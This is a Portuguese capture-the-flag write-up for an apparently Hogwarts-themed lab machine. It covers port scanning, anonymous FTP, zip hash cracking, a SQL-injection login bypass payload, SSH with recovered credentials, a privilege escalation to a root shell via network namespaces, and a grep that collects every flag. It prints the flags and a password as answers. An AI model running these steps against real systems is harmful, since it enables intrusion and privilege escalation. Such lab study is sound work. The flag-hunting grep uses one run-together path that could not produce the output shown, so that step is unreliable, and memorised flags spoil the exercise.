1. Descobrir portas abertas e serviços rodando.
Comando: nmap -sV -sC -Pn -T4 -p- 10.10.212.163
Resultado: 
PORT      STATE SERVICE VERSION
22/tcp    open  http    Apache httpd 2.4.38 ((Debian))
9440/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10
9736/tcp  open  http    PHP cli server 5.5 or later
|_http-title: Hogwart's Royal Entry
10255/tcp open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
43768/tcp open  unknown
| last sighted in hogwa

=======================================================================

2. Exploração de FTP
Comando: ftp 10.10.212.163 10255
Resultado:
  drwxr-xr-x    3 ftp      ftp          4096 Sep 06  2020 ..
drwxr-xr-x    2 ftp      ftp          4096 Apr 27 09:04 ...
-rw-r--r--    1 ftp      ftp           105 Sep 06  2020 GoAway.exe
(Ao entrar no diretorio "..." encontramos mais arquivos)
Comando: ftp> cd ...
Resultado: 250 Directory successfully changed.
Comando: ftp> ls -la
Resultado:
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Apr 27 09:04 .
drwxr-xr-x    3 ftp      ftp          4096 Sep 06  2020 ..
-rw-r--r--    1 ftp      ftp           231 Apr 27 09:04 .I_saved_it_harry.zip
-rw-r--r--    1 ftp      ftp           157 Sep 06  2020 note4neville

  Após isso damos um Cat para ver o conteudo dos aruqivos
COmando:root@ip-10-10-153-170:~# cat note4neville 
Hagrid: Oi Neville even I ws able to open your secret file!
COmando:root@ip-10-10-153-170:~# cat GoAway.exe 
Hagrid: Oh no harry, y'are steell poking injections around 'ere aren't ya?

  Ao tentar dar unzip no arquivo .I_saved_it_harry.zip ele pede uma senha, como noa temos vamos extrair o hash dele e depois quebrar para descobrir a senha.

COmando:  zip2john .I_saved_it_harry.zip > zip.hash  # extrai o hash dele para o arquivo zip.hash
john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash # utiliza o john e uma worldlist para quebrar o hash e descobrir a senha
  anime            (.I_saved_it_harry.zip/boot/.pass)
1g 0:00:00:00 DONE (2026-04-27 10:13)
COmando: unzip .I_saved_it_harry.zip # sabendo qeu a senha é "anime" vamos extrair agora
COmando: cat boot/.pass
  root@ip-10-10-153-170:~# cat boot/.pass 
neville:ocxxbwaznnkzkymq6m7tmdykv # Com isso obtemos o usuario e a senha para entrar no servidor SSH
  Deixaremos para depois!!
  ==================================================================================

  3. Exploração Web
Ao acessar a porta 9736, vimos que tem um sistema de login, e segundo a dica do Hagrid que diz "injection" utilizaremos o payload admin' or '1'='1'# para conseguir acesso
  user: admin
  senha: admin' or '1'='1'#
  com isso acessamos o site que nada mais é que uma tela preta, mas ao entra no source code view encontramos a primeira flag.
  ================================================================================
  4. Voltando para o SSH
 utilizando o que descobrimos no passo 3 logamos no ssh
Comando: ssh neville@10.10.212.163 -p 9440
  password: ocxxbwaznnkzkymq6m7tmdykv

  ao entrar escalamos privilegio:
COmanod: ip netns add foo
ip netns exec foo /bin/sh -p

  Agora dentro do servidor com o user ROOT, para nao perdem tempo, sabemos que as flags começam com THM{}, entap rodaremos um comadno para extrair tudo que contem "THM{}" do servidor, assim conseguindo todas as flags sem esforço.
 comando: grep -rE "THM\{|flag\{" /var/etc/opt/home/root/srv 2>/dev/null
  resultado:
/var/log/auth.log:Sep  6 14:14:35 ip-10-10-58-203 sudo:     root : TTY=pts/1 ; PWD=/data ; USER=root ; COMMAND=/bin/echo THM{its_wingardium_laviosaa_Ron}
/var/log/auth.log:Sep  6 14:14:35 ip-10-10-58-203 sudo:     root : TTY=pts/1 ; PWD=/data ; USER=root ; COMMAND=/bin/echo THM{Yeah_1_swallowed_the_sn1tch.}
/var/log/auth.log:Sep  6 14:14:35 ip-10-10-58-203 sudo:     root : TTY=pts/1 ; PWD=/data ; USER=root ; COMMAND=/bin/echo THM{I_unarm3d_dumbled0re}
/var/log/auth.log:Sep  6 14:14:35 ip-10-10-58-203 sudo:     root : TTY=pts/1 ; PWD=/data ; USER=root ; COMMAND=/bin/echo THM{Albus_Perciva1_Wu1fric_Brian_Dumb1ed0re}
/etc/left_corridor/seventh_floor/.entrance:THM{That-boy-was-Tom-Riddle}
/home/hermoine/special_spell.txt:THM{its_wingardium_laviosaa_Ron}
/home/draco/achievements.txt:THM{I_unarm3d_dumbled0re}
/home/harry/special_spell.txt:THM{Yeah_1_swallowed_the_sn1tch.}

  Assim finalizadno o ctf.


